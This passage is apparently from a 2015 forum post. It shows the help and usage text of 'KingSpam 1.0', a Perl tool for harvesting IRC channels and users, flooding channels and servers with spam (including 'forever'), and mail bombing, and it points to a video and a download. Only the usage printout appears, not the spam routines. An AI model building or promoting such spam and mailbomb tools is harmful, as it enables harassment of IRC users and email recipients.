-spam_file <spam> -timeout <timeout> : Spam in a Channel\n"; "-spam_channel_forever <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel Forever\n"; "-spam_server <host> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a server\n"; "-spam_servers_list <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in multiple servers\n"; "-spam_targets <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in servers & channels saved\n"; print "-mailbomber : Open MailBomber\n"; printear("\n[+] Example : \n\n"); print "perl kingspam.pl -get_channels localhost\n"; print "perl kingspam.pl -get_users localhost -channel #locos\n"; "perl kingspam.pl -spam_channel localhost -channel #locos -spam_file c:/spam.txt\n"; "perl kingspam.pl -spam_channel_forever localhost -channel #locos -spam_file c:/spam.txt\n"; print "perl kingspam.pl -spam_server localhost -spam_file c:/spam.txt\n"; "perl kingspam.pl -spam_servers_file c:/servers.txt -nick ClapTrap -spam_file c:/spam.txt\n"; "perl kingspam.pl -spam_targets c:/servers.txt -spam_file c:/spam.txt\n"; print "perl kingspam.pl -mailbomber\n"; } sub head { printear_logo("\n-- == KingSpam 1.0 == --\n\n\n"); } sub copyright { printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n"); } # The End ?
Un video con ejemplos de uso : Si quieren bajar el programa lo pueden hacer de aca : SourceForge.
|
|
|
|
|
|
|